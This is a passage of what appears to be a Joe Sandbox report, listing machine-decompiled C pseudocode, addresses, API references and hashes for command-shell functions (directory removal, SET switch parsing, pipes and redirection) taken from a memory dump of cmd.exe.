									L30:
									_push(0x232a);
									E001BC5A2(_t103);
									goto L18;
								} else {
									goto L8;
								}
								goto L16;
								L8:
								_t112 =  *((intOrPtr*)(_t112 + 0xc));
								_t118 = _t118 - 1;
							} while (_t118 != 0);
							_t119 =  &_v580;
							_t82 = _v656 & 0x00000010;
							_v664 = _t82;
							do {
								if(_t82 == 0) {
									if(RemoveDirectoryW( *_t119) != 0) {
										goto L13;
									} else {
										_t87 = GetLastError();
										_t122 = _t87;
										_push(0);
										_push(_t87);
										goto L28;
									}
									goto L16;
								} else {
									if((_v656 & 0x00002000) == 0) {
										_t112 = 0x234e;
										if(E001D9583( *_t119, 0x234e, 0x2328) == 1) {
											goto L12;
										} else {
											_t122 = 1;
											goto L13;
										}
										goto L16;
									} else {
										L12:
										_t109 =  *_t119;
										_t112 =  &_v668;
										_t91 = E001B85EA( *_t119,  &_v668);
										if(_t91 != 0) {
											if(_t91 != 0x91 || _v668 != 0) {
												_t109 = 0;
												_t122 = _t91;
												_push(0);
												_push(_t91);
												L28:
												E001BC5A2(_t109);
												_pop(_t109);
											}
										}
									}
								}
								L13:
								_t119 = _t119[3];
								_t82 = _v664;
								_t95 = _t95 - 1;
							} while (_t95 != 0);
							_t84 = _v24;
							if(_v24 == 0) {
								_t84 = _t128 + 0x88;
							}
							E001C0BFC(_t84,  *((intOrPtr*)(_t128 + 0x298)));
							E001C2A06(_v668, _t119);
						}
					}
				}
				L16:
				__imp__??_V@YAXPAX@Z(_v28);
				_pop(_t116);
				_pop(_t123);
				_pop(_t94);
				return E001C6FD0(_t122, _t94, _v8 ^ _t128, _t112, _t116, _t123);
			}

0x001b88e0
0x001b88e6
0x001b88ed
0x001b88f6
0x001b88ff
0x001b8903
0x001b8907
0x001b890e
0x001b8916
0x001b891a
0x001b891e
0x001b8922
0x001b8926
0x001b892a
0x001b892e
0x001b8932
0x001b8936
0x001b893a
0x001b893e
0x001b8942
0x001b8946
0x001b8947
0x001b894b
0x001b8952
0x001b8953
0x001b8954
0x001b8958
0x001b8960
0x001b8964
0x001b8968
0x001b896c
0x001b8970
0x001b8974
0x001b8978
0x001b8979
0x001b897a
0x001b8981
0x001b8991
0x001b8996
0x001b89ac
0x001b8ad2
0x001b8ad4
0x001b89b2
0x001b89b7
0x001b89bd
0x001b89c3
0x001b89cb
0x001b89cd
0x001b89d1
0x001b89d5
0x001b89e1
0x00000000
0x001b89e7
0x001b89e7
0x001b89f0
0x001d06ab
0x001d06ab
0x001b89f6
0x001b89fe
0x001b8a03
0x001b8a09
0x001d06b7
0x00000000
0x001b8a0f
0x001b8a0f
0x001b8a13
0x001b8a15
0x001b8a15
0x001b8a1a
0x001b8a1e
0x001b8a1e
0x001b8a21
0x001b8a24
0x001b8a2b
0x001b8a2f
0x001b8a31
0x001d0720
0x001d0721
0x001d0721
0x001d0726
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x001b8a37
0x001b8a37
0x001b8a3a
0x001b8a3a
0x001b8a43
0x001b8a47
0x001b8a4a
0x001b8a4e
0x001b8a50
0x001d0700
0x00000000
0x001d0706
0x001d0706
0x001d070c
0x001d0710
0x001d0711
0x00000000
0x001d0711
0x00000000
0x001b8a56
0x001b8a5e
0x001d06bc
0x001d06ce
0x00000000
0x001d06d4
0x001d06d6
0x00000000
0x001d06d6
0x00000000
0x001b8a64
0x001b8a64
0x001b8a64
0x001b8a66
0x001b8a6a
0x001b8a71
0x001d06e1
0x001d06ee
0x001d06f0
0x001d06f2
0x001d06f3
0x001d0712
0x001d0712
0x001d0718
0x001d0718
0x001d06e1
0x001b8a71
0x001b8a5e
0x001b8a77
0x001b8a77
0x001b8a7a
0x001b8a7e
0x001b8a7e
0x001b8a83
0x001b8a8c
0x001b8ac9
0x001b8ac9
0x001b8a96
0x001b8a9f
0x001b8a9f
0x001b8a09
0x001b89e1
0x001b8aa4
0x001b8aab
0x001b8abb
0x001b8abc
0x001b8abd
0x001b8ac8

APIs

memset.MSVCRT ref: 001B8991

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

??_V@YAXPAX@Z.MSVCRT ref: 001B8AAB

Part of subcall function 001C36CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,001B590A,00000000), ref: 001C36F0

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$CurrentDirectory
String ID:
API String ID: 168429351-0
Opcode ID: f79e55c4a98e57cb050d739aaf0a21a1a8697db5531081ce3ed3a7d3888f54dc
Instruction ID: cb1badc8fc8ed333ad86c0a062582b4cabccd6448a30b338d4e3dbac3e2a0be9
Opcode Fuzzy Hash: f79e55c4a98e57cb050d739aaf0a21a1a8697db5531081ce3ed3a7d3888f54dc
Instruction Fuzzy Hash: 9B6136716083419FD328DF29D8856ABBBE9BBD8710F14492EF599C7360DB30E944CB46

Uniqueness

Uniqueness Score: -1.00%

Function 001B5F75 Relevance: 6.2, APIs: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E001B5F75(void* __ecx) {
				short* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t22;
				intOrPtr _t24;
				short* _t28;
				void* _t29;
				void* _t30;
				long _t32;
				signed int _t34;
				void* _t35;
				signed int _t38;
				signed int _t39;
				wchar_t* _t40;
				long _t41;
				wchar_t* _t42;
				signed int _t44;
				signed int _t45;
				void* _t46;
				void* _t47;
				wchar_t* _t51;
				wchar_t* _t60;
				signed int _t61;
				signed int _t70;
				void* _t71;
				wchar_t* _t73;
				void* _t75;
				long* _t78;
				long* _t80;
				long _t81;
				void* _t82;
				signed short* _t84;
				wchar_t* _t85;

				_t84 =  *(__ecx + 0x3c);
				if( *0x1f3cc9 == 0) {
					_t85 = E001BEA40(_t84, "=", 3);
					_t83 = 0;
					__eflags =  *_t85;
					if( *_t85 == 0) {
						L26:
						return E001D4506( *0x1e3834);
					}
					_t73 = _t85;
					_v8 = 0;
					_t46 = 2;
					do {
						_t51 = _t73;
						_t6 =  &(_t51[0]); // 0x2
						_v12 = _t6;
						do {
							_t22 =  *_t51;
							_t51 = _t51 + _t46;
							__eflags = _t22 - _t83;
						} while (_t22 != _t83);
						_t53 = _t51 - _v12 >> 1;
						_t73 = _t73 + (_t51 - _v12 >> 1) * 2 + 2;
						_t24 = _v8 + 1;
						_v8 = _t24;
						__eflags =  *_t73 - _t83;
					} while ( *_t73 != _t83);
					__eflags = _t24 - 3;
					if(_t24 > 3) {
						L40:
						_push(_t83);
						_push(0x232a);
						E001BC5A2(_t53);
						return 1;
					}
					_t53 = _t85;
					_t28 = E001BD7E6(_t53);
					_v8 = _t28;
					__eflags =  *_t28 - 0x3d;
					if( *_t28 != 0x3d) {
						goto L40;
					}
					_t75 = _t53 + 2;
					do {
						_t29 =  *_t53;
						_t53 = _t53 + _t46;
						__eflags = _t29 - _t83;
					} while (_t29 != _t83);
					_v12 = _t53 - _t75 >> 1;
					_t30 = E001C22C0(_t46, _t85);
					__eflags = _v12 + 1;
					E001C1040(_t85, _v12 + 1, _t30);
					_t60 = _t85;
					_t17 =  &(_t60[0]); // 0x2
					_t78 = _t17;
					do {
						_t32 =  *_t60;
						_t60 = _t60 + _t46;
						__eflags = _t32 - _t83;
					} while (_t32 != _t83);
					_t61 = _t60 - _t78;
					__eflags = _t61;
					_t53 = _t61 >> 1;
					if(_t61 == 0) {
						goto L40;
					}
					_t80 = _v8 + 4;
					L14:
					return E001C3A50(_t85, _t80);
				}
				if(_t84 == 0) {
					goto L26;
				}
				_t34 =  *_t84 & 0x0000ffff;
				if(_t34 == 0) {
					goto L26;
				}
				_t53 = _t34;
				_t35 = 0x20;
				_t47 = 2;
				while(_t53 <= _t35) {
					_t84 = _t84 + _t47;
					_t45 =  *_t84 & 0x0000ffff;
					_t53 = _t45;
					_t35 = 0x20;
					if(_t45 != 0) {
						continue;
					}
					break;
				}
				_t83 = 0;
				if( *_t84 == 0) {
					goto L26;
				}
				__imp___wcsnicmp(_t84, L"/A", _t47);
				if(_t35 == 0) {
					return E001B6052( &(_t84[2]));
				}
				__imp___wcsnicmp(_t84, L"/P", _t47);
				if(_t35 == 0) {
					return E001D474C(_t47,  &(_t84[2]), _t71, 0, _t84, __eflags);
				}
				_t38 =  *_t84 & 0x0000ffff;
				if(_t38 == 0x2f) {
					goto L40;
				}
				_t81 = 0x22;
				if(_t38 == _t81) {
					_t85 = _t84 + _t47;
					_t39 =  *_t85 & 0x0000ffff;
					__eflags = _t39;
					if(_t39 == 0) {
						L24:
						_t40 = wcsrchr(_t85, _t81);
						_pop(_t53);
						__eflags = _t40;
						if(_t40 != 0) {
							_t53 = 0;
							 *_t40 = 0;
						}
						goto L11;
					}
					_t70 = _t39;
					_t82 = 0x20;
					while(1) {
						__eflags = _t70 - _t82;
						if(_t70 > _t82) {
							break;
						}
						_t85 = _t85 + _t47;
						_t44 =  *_t85 & 0x0000ffff;
						_t70 = _t44;
						__eflags = _t44;
						if(_t44 != 0) {
							continue;
						}
						break;
					}
					_t81 = 0x22;
					goto L24;
				}
				L11:
				_t41 = 0x3d;
				if( *_t85 == _t41) {
					goto L40;
				}
				_t42 = wcschr(_t85, _t41);
				if(_t42 == 0) {
					return E001D4588(_t85);
				}
				_t2 =  &(_t42[0]); // 0x2
				_t80 = _t2;
				 *_t42 = 0;
				goto L14;
			}

0x001b5f86
0x001b5f8a
0x001ca9e9
0x001ca9eb
0x001ca9ed
0x001ca9f0
0x001ca9cb
0x00000000
0x001ca9d1
0x001ca9f4
0x001ca9f6
0x001ca9f9
0x001ca9fa
0x001ca9fa
0x001ca9fc
0x001ca9ff
0x001caa02
0x001caa02
0x001caa05
0x001caa07
0x001caa07
0x001caa12
0x001caa17
0x001caa1a
0x001caa1b
0x001caa1e
0x001caa1e
0x001caa23
0x001caa26
0x001caa7f
0x001caa7f
0x001caa80
0x001caa85
0x00000000
0x001caa8e
0x001caa28
0x001caa2a
0x001caa2f
0x001caa32
0x001caa36
0x00000000
0x00000000
0x001caa38
0x001caa3b
0x001caa3b
0x001caa3e
0x001caa40
0x001caa40
0x001caa49
0x001caa4e
0x001caa59
0x001caa5a
0x001caa5f
0x001caa61
0x001caa61
0x001caa64
0x001caa64
0x001caa67
0x001caa69
0x001caa69
0x001caa6e
0x001caa6e
0x001caa70
0x001caa72
0x00000000
0x00000000
0x001caa77
0x001b6031
0x00000000
0x001b6033
0x001b5f92
0x00000000
0x00000000
0x001b5f98
0x001b5f9e
0x00000000
0x00000000
0x001b5fa6
0x001b5fa8
0x001b5fab
0x001b5fac
0x001b5fb1
0x001b5fb5
0x001b5fb8
0x001b5fbd
0x001b5fbe
0x00000000
0x00000000
0x00000000
0x001b5fbe
0x001b5fc0
0x001b5fc5
0x00000000
0x00000000
0x001b5fd2
0x001b5fdd
0x00000000
0x001b6042
0x001b5fe6
0x001b5ff1
0x00000000
0x001ca982
0x001b5ff7
0x001b5ffd
0x00000000
0x00000000
0x001b6005
0x001b6009
0x001ca98c
0x001ca98e
0x001ca991
0x001ca994
0x001ca9af
0x001ca9b1
0x001ca9b8
0x001ca9b9
0x001ca9bb
0x001ca9c1
0x001ca9c3
0x001ca9c3
0x00000000
0x001ca9bb
0x001ca998
0x001ca99a
0x001ca99b
0x001ca99b
0x001ca99e
0x00000000
0x00000000
0x001ca9a0
0x001ca9a2
0x001ca9a5
0x001ca9a7
0x001ca9aa
0x00000000
0x00000000
0x00000000
0x001ca9aa
0x001ca9ae
0x00000000
0x001ca9ae
0x001b600f
0x001b6011
0x001b6015
0x00000000
0x00000000
0x001b601d
0x001b6027
0x00000000
0x001b604b
0x001b602b
0x001b602b
0x001b602e
0x00000000

APIs

_wcsnicmp.MSVCRT ref: 001B5FD2
_wcsnicmp.MSVCRT ref: 001B5FE6
wcschr.MSVCRT ref: 001B601D

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: _wcsnicmp$wcschr
String ID:
API String ID: 3270668897-0
Opcode ID: 1398119f769916a9ad0d5d55bbecb753bd6d26fd9dff8a97a9347b6af33ebb33
Instruction ID: 16877aa3d24c76c7492c5a2f750904fadf35053466ceb9e5d1a9e2a0e040ae7d
Opcode Fuzzy Hash: 1398119f769916a9ad0d5d55bbecb753bd6d26fd9dff8a97a9347b6af33ebb33
Instruction Fuzzy Hash: CE51A03530021497DB29FB259862BBF73A0EFB4748B95445DF8439B2C1EB35CE81C291

Uniqueness

Uniqueness Score: -1.00%

Function 001BAF70 Relevance: 6.2, APIs: 4, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E001BAF70(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _t39;
				void** _t40;
				void* _t42;
				signed int _t46;
				void* _t48;
				void* _t50;
				intOrPtr _t54;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t68;
				long _t75;
				void* _t78;
				signed int _t83;
				void* _t87;
				signed int _t102;
				long _t114;
				void* _t116;
				void* _t117;
				void** _t119;

				_push(__ecx);
				_t39 = _a4;
				_t114 =  *((intOrPtr*)(_t39 + 0x38));
				_t75 =  *((intOrPtr*)(_t39 + 0x3c));
				_t78 = 0x28;
				_t40 = E001C00B0(_t78);
				_t119 = _t40;
				if(_t119 == 0) {
					L27:
					_t42 = 1;
				} else {
					__imp___pipe(_t119, 0, 0x8000);
					if(_t40 != 0) {
						_push(0);
						_push(8);
						E001BC5A2(_t78);
						goto L27;
					} else {
						E001BB15E( *_t119);
						E001BB15E(_t119[1]);
						_t46 =  *0x1dd550; // 0x0
						_t83 = _t46;
						 *0x1dd550 = _t46 + 1;
						if(_t83 != 0) {
							_t48 =  *0x1dd5c0; // 0x0
							 *(_t48 + 0x24) = _t119;
							_t119[9] = _t119[9] & 0x00000000;
							_t119[8] = _t48;
						} else {
							_t119[8] = _t119[8] & _t83;
							 *0x1dd5c4 = _t119;
						}
						_t85 = 1;
						 *0x1dd5c0 = _t119;
						_t50 = E001BDBCE(_t119, 1);
						_t119[3] = _t50;
						if(_t50 == 0xffffffff) {
							_t119[3] = _t119[3] | 0xffffffff;
							L23:
							_push(0);
							L31:
							E001BC5A2(_t85);
							_t87 = 0x2351;
							L32:
							E001D9287(_t87);
							__imp__longjmp(0x1eb8b8, 1);
							asm("int3");
							_t102 = (_t87 - 0x20 >> 5) + 1;
							_t54 =  *((intOrPtr*)(0x1dd5d0 + _t102 * 4));
							asm("bts eax, ecx");
							 *((intOrPtr*)(0x1dd5d0 + _t102 * 4)) = _t54;
							return _t54;
						}
						_t85 = _t119[1];
						if(E001BDBFC(_t119[1], 1) == 0xffffffff) {
							goto L23;
						}
						E001BDB92(_t119[1]);
						_t119[1] = _t119[1] & 0x00000000;
						if( *_t114 <= 0) {
							E001BE040(_t114,  &_v8);
						}
						_t116 = E001C0E00(1, _t114);
						if( *0x1dd54c != 0) {
							__imp___get_osfhandle(1);
							DuplicateHandle( *0x1dd54c, 0,  *_t119, 0, 0, 0, 0);
						}
						_t85 = _t119[3];
						if(E001BDBFC(_t119[3], 1) == 0xffffffff) {
							goto L23;
						}
						_t87 = _t119[3];
						E001BDB92(_t87);
						_t119[3] = _t119[3] & 0x00000000;
						if(_t116 != 0) {
							goto L32;
						}
						_t60 =  *0x1dd54c; // 0x0
						_t85 = 0;
						_t119[4] = _t60;
						_t119[6] =  *0x1e3838;
						 *0x1dd54c = _t116;
						 *0x1e3838 = _t116;
						_t62 = E001BDBCE( *0x1e3838, 0);
						_t119[2] = _t62;
						if(_t62 == 0xffffffff) {
							_t119[2] = _t119[2] | 0xffffffff;
							L30:
							_push(_t116);
							goto L31;
						}
						_t85 =  *_t119;
						if(E001BDBFC( *_t119, 0) == 0xffffffff) {
							goto L30;
						}
						E001BDB92( *_t119);
						 *_t119 = _t116;
						if( *_t75 <= _t116) {
							E001BE040(_t75,  &_v8);
						}
						_t65 = E001C0E00(1, _t75);
						_t85 = _t119[2];
						_t117 = _t65;
						if(E001BDBFC(_t119[2], 0) == 0xffffffff) {
							goto L23;
						}
						E001BDB92(_t119[2]);
						_t87 = 0;
						_t119[2] = 0;
						if(_t117 != 0) {
							goto L32;
						}
						 *0x1dd550 =  *0x1dd550 - 1;
						_t68 =  *0x1dd54c; // 0x0
						_t119[5] = _t68;
						_t119[7] =  *0x1e3838;
						 *0x1dd54c = 0;
						 *0x1e3838 = 0;
						if( *0x1dd550 != 0) {
							_t42 = 0;
						} else {
							_t42 = E001BB183();
						}
					}
				}
				return _t42;
			}

0x001baf78
0x001baf79
0x001baf7f
0x001baf82
0x001baf87
0x001baf88
0x001baf8d
0x001baf91
0x001d12c3
0x001d12c5
0x001baf97
0x001baf9f
0x001bafaa
0x001d12b8
0x001d12ba
0x001d12bc
0x00000000
0x001bafb0
0x001bafb2
0x001bafba
0x001bafbf
0x001bafc4
0x001bafc7
0x001bafce
0x001bb13f
0x001bb144
0x001bb147
0x001bb14b
0x001bafd4
0x001bafd4
0x001bafd7
0x001bafd7
0x001bafe1
0x001bafe2
0x001bafe7
0x001bafec
0x001baff2
0x001d12cb
0x001bb157
0x001bb157
0x001d12d9
0x001d12de
0x001d12e4
0x001d12e5
0x001d12e5
0x001d12f1
0x001d12f7
0x001d12fe
0x001bb171
0x001bb178
0x001bb17b
0x00000000
0x001bb17b
0x001baff8
0x001bb006
0x00000000
0x00000000
0x001bb00f
0x001bb014
0x001bb01b
0x001bb023
0x001bb023
0x001bb039
0x001bb03b
0x001bb047
0x001bb055
0x001bb055
0x001bb05b
0x001bb069
0x00000000
0x00000000
0x001bb06f
0x001bb072
0x001bb077
0x001bb07d
0x00000000
0x00000000
0x001bb083
0x001bb088
0x001bb08a
0x001bb092
0x001bb095
0x001bb09b
0x001bb0a1
0x001bb0a6
0x001bb0ac
0x001d12d4
0x001d12d8
0x001d12d8
0x00000000
0x001d12d8
0x001bb0b2
0x001bb0be
0x00000000
0x00000000
0x001bb0c6
0x001bb0cb
0x001bb0cf
0x001bb0d7
0x001bb0d7
0x001bb0e1
0x001bb0e6
0x001bb0eb
0x001bb0f5
0x00000000
0x00000000
0x001bb0fa
0x001bb0ff
0x001bb101
0x001bb106
0x00000000
0x00000000
0x001bb10c
0x001bb113
0x001bb118
0x001bb120
0x001bb123
0x001bb129
0x001bb12f
0x001bb153
0x001bb131
0x001bb131
0x001bb131
0x001bb12f
0x001bafaa
0x001bb13c

APIs

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

_pipe.MSVCRT ref: 001BAF9F

Part of subcall function 001BDBCE: _dup.MSVCRT ref: 001BDBD5

longjmp.MSVCRT(001EB8B8,00000001), ref: 001D12F1

Part of subcall function 001BDBFC: _dup2.MSVCRT ref: 001BDC10

Part of subcall function 001BDB92: _close.MSVCRT ref: 001BDBC1

_get_osfhandle.MSVCRT ref: 001BB047
DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 001BB055

Part of subcall function 001BE040: memset.MSVCRT ref: 001BE090
Part of subcall function 001BE040: wcschr.MSVCRT ref: 001BE0F3
Part of subcall function 001BE040: wcschr.MSVCRT ref: 001BE10B
Part of subcall function 001BE040: _wcsicmp.MSVCRT ref: 001BE179

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
String ID:
API String ID: 1441200171-0
Opcode ID: e55cd4e547d6f40ecaff9bb4e426856ed2d3107b8a83cebfc62d3d032eb99e9e
Instruction ID: 83212266b5fd6a4b9650a7b810e29fb3c2a62a79cbd85dabb8d2fc97f003ca59
Opcode Fuzzy Hash: e55cd4e547d6f40ecaff9bb4e426856ed2d3107b8a83cebfc62d3d032eb99e9e
Instruction Fuzzy Hash: BE5184306057009BD728EF29FC96A7673E5EB94324F248A1EF466C7AE1EB719841CB41

Uniqueness

Uniqueness Score: -1.00%

Function 001C02B0 Relevance: 6.2, APIs: 4, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E001C02B0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* _v16;
				signed short* _v20;
				signed short _v24;
				signed short _t29;
				signed int _t30;
				intOrPtr _t31;
				int _t34;
				intOrPtr* _t36;
				intOrPtr _t39;
				int _t47;
				intOrPtr _t48;
				intOrPtr* _t59;
				intOrPtr* _t63;
				signed short _t69;
				signed short* _t70;
				intOrPtr* _t71;
				signed short _t76;
				intOrPtr* _t77;
				signed short _t83;
				void* _t91;
				void* _t95;

				_v8 =  *((intOrPtr*)(_t91 + 4));
				_t95 = (_t91 - 0x00000008 & 0xfffffff8) + 4 - 0x10;
				_t83 = 0;
				_v16 = __ecx;
				_v24 = 0;
				while(1) {
					_t69 =  *0x1efaa0;
					_t29 = _t69 & 0x0000ffff;
					_t76 = _t29;
					_v20 = _t29;
					_t30 = _t76 & 0x0000ffff;
					if(_t30 == 0x3e || _t30 == 0x3c) {
						goto L7;
					}
					_t41 = iswdigit(_t69 & 0x0000ffff);
					_t95 = _t95 + 4;
					if(_t41 != 0) {
						_t76 =  *0x1efaa2;
						_t41 = _t76 & 0x0000ffff;
						if(_t41 != 0x3e) {
							if(_t41 == 0x3c) {
								goto L7;
							} else {
								goto L4;
							}
						} else {
							goto L7;
						}
					} else {
						L4:
						if(_t83 != 0) {
							if(_v24 == _t83) {
								E001BF300(_t41, 0, 0, 0);
							}
							return 1;
						} else {
							return 0;
						}
					}
					L40:
					L7:
					_t31 = E001C00B0(0x18);
					_t59 = _v16;
					 *_t59 = _t31;
					if(_t31 == 0) {
						 *0x1ef980 = 0x234a;
						__imp__longjmp(0x1eb940, 1);
						asm("int3");
						if(_t59 <= 0xc42e || _t59 == 0xc431 || _t59 == 0xc433) {
							_t69 = 0;
						}
						return _t69;
					} else {
						 *(_t31 + 0x10) = _t76;
						_t83 = _t83 + 1;
						_v20 = 0x1efaa0;
						_t34 = iswdigit( *0x1efaa0 & 0x0000ffff);
						_t95 = _t95 + 4;
						_t36 =  *_v16;
						if(_t34 != 0) {
							 *_t36 = ( *0x1efaa0 & 0x0000ffff) - 0x30;
							_t63 = 0x1efaa2;
						} else {
							_t63 = _v20;
							if(_t76 != 0x3e) {
								 *_t36 = 0;
							} else {
								 *_t36 = 1;
							}
						}
						_t11 = _t63 + 2; // 0x1efaa4
						_t70 = _t11;
						_v20 = _t70;
						if( *_t63 !=  *_t70) {
							_t77 = _v16;
						} else {
							if(_t76 == 0x3c) {
								E001D82EB(_t63);
								_t70 = _v20;
							}
							_t77 = _v16;
							_t63 = _t70;
							 *((intOrPtr*)( *_t77 + 0xc)) = 1;
						}
						_t64 = _t63 + 2;
						_v20 = _t64;
						if( *_t64 == 0x26) {
							_t71 = _t64;
							_t22 = _t71 + 2; // 0x1efaa2
							_v16 = _t22;
							do {
								_t39 =  *_t71;
								_t71 = _t71 + 2;
							} while (_t39 != 0);
							if(_t71 - _v16 >> 1 != 2) {
								L28:
								E001D82EB(_t64);
							} else {
								_t47 = iswdigit( *(_t64 + 2) & 0x0000ffff);
								_t95 = _t95 + 4;
								if(_t47 == 0) {
									goto L28;
								} else {
									_t48 = E001BDF40(_v20);
									_t64 =  *_t77;
									 *((intOrPtr*)( *_t77 + 4)) = _t48;
									if(_t48 == 0) {
										goto L28;
									}
								}
							}
						} else {
							 *((intOrPtr*)( *_t77 + 4)) = E001BDDCD(_t64);
						}
						if(E001BEEC8() == 0) {
							goto L4;
						} else {
							E001BF030(0);
							_v24 = _v24 + 1;
							_v16 =  *_t77 + 0x14;
							continue;
						}
					}
					goto L40;
				}
			}

0x001c02c2
0x001c02c8
0x001c02cc
0x001c02ce
0x001c02d2
0x001c02e0
0x001c02e0
0x001c02e7
0x001c02ea
0x001c02ed
0x001c02f0
0x001c02f6
0x00000000
0x00000000
0x001c0301
0x001c0307
0x001c030c
0x001c0321
0x001c0328
0x001c032e
0x001ccad6
0x00000000
0x001ccadc
0x00000000
0x001ccadc
0x00000000
0x00000000
0x00000000
0x001c030e
0x001c030e
0x001c0310
0x001c03ec
0x001c03f4
0x001c03f4
0x001c0406
0x001c0316
0x001c0320
0x001c0320
0x001c0310
0x00000000
0x001c0334
0x001c0339
0x001c033e
0x001c0341
0x001c0345
0x001ccb00
0x001ccb0a
0x001ccb10
0x001ccb17
0x001c065e
0x001c065e
0x001c065d
0x001c034b
0x001c034b
0x001c035b
0x001c035d
0x001c0360
0x001c0366
0x001c036e
0x001c0370
0x001c0416
0x001c0418
0x001c0376
0x001c0376
0x001c037d
0x001ccae1
0x001c0383
0x001c0383
0x001c0383
0x001c037d
0x001c038c
0x001c038c
0x001c038f
0x001c0395
0x001c0407
0x001c0397
0x001c039b
0x001ccaec
0x001ccaf1
0x001ccaf1
0x001c03a1
0x001c03a4
0x001c03a8
0x001c03a8
0x001c03af
0x001c03b2
0x001c03b9
0x001c0422
0x001c0424
0x001c0427
0x001c0430
0x001c0430
0x001c0433
0x001c0436
0x001c0443
0x001c046c
0x001c046c
0x001c0445
0x001c044a
0x001c0450
0x001c0455
0x00000000
0x001c0457
0x001c045a
0x001c045f
0x001c0461
0x001c0466
0x00000000
0x00000000
0x001c0466
0x001c0455
0x001c03bb
0x001c03c2
0x001c03c2
0x001c03cc
0x00000000
0x001c03d2
0x001c03d4
0x001c03de
0x001c03e1
0x00000000
0x001c03e1
0x001c03cc
0x00000000
0x001c0345

APIs

iswdigit.MSVCRT ref: 001C0301
iswdigit.MSVCRT ref: 001C0360
iswdigit.MSVCRT ref: 001C044A

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: iswdigit
String ID:
API String ID: 3849470556-0
Opcode ID: 625c5a6b998665d56df68d38c1f938675ffc4dc03839fe79a9f8755d43539c6e
Instruction ID: 8f5c62c7efc036d5fc0b59d09aae983c8fbd3732af726e9489348d40aa125cb0
Opcode Fuzzy Hash: 625c5a6b998665d56df68d38c1f938675ffc4dc03839fe79a9f8755d43539c6e
Instruction Fuzzy Hash: 0D51E370900144DFCB19DFA9C985B7EB7A1FBA8300F2541AEE8058B391EB31DD96DB91

Uniqueness

Uniqueness Score: -1.00%

Function 001C2D22 Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E001C2D22(intOrPtr* __ecx, long __edx, WCHAR* _a4) {
				long _v8;
				WCHAR* _v12;
				void* __ebx;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t35;
				short _t38;
				signed short _t40;
				int _t41;
				long _t46;
				intOrPtr _t49;
				short _t50;
				int _t53;
				intOrPtr* _t60;
				signed int _t62;
				signed short* _t63;
				intOrPtr* _t68;
				signed int _t70;
				void* _t72;
				void* _t75;
				signed short* _t76;
				void* _t78;
				WCHAR* _t80;
				long _t82;
				intOrPtr* _t84;
				signed int _t86;
				signed short* _t87;

				_push(__ecx);
				_push(__ecx);
				_t80 = __ecx;
				_v8 = __edx;
				_t57 = _a4;
				_t53 = 0;
				_t84 = _a4;
				_t3 = _t84 + 2; // 0x2
				_t72 = _t3;
				do {
					_t30 =  *_t84;
					_t84 = _t84 + 2;
				} while (_t30 != 0);
				_t86 = _t84 - _t72 >> 1;
				_t31 = E001C22C0(0, _t57);
				_t4 = _t86 + 1; // -1
				_t87 = _a4;
				E001C1040(_t87, _t4, _t31);
				if(( *_t87 & 0x0000ffff) == 0) {
					E001C36CB(0, __ecx, _v8, 0);
					_t60 = __ecx + 4;
					_t75 = _t60 + 2;
					do {
						_t35 =  *_t60;
						_t60 = _t60 + 2;
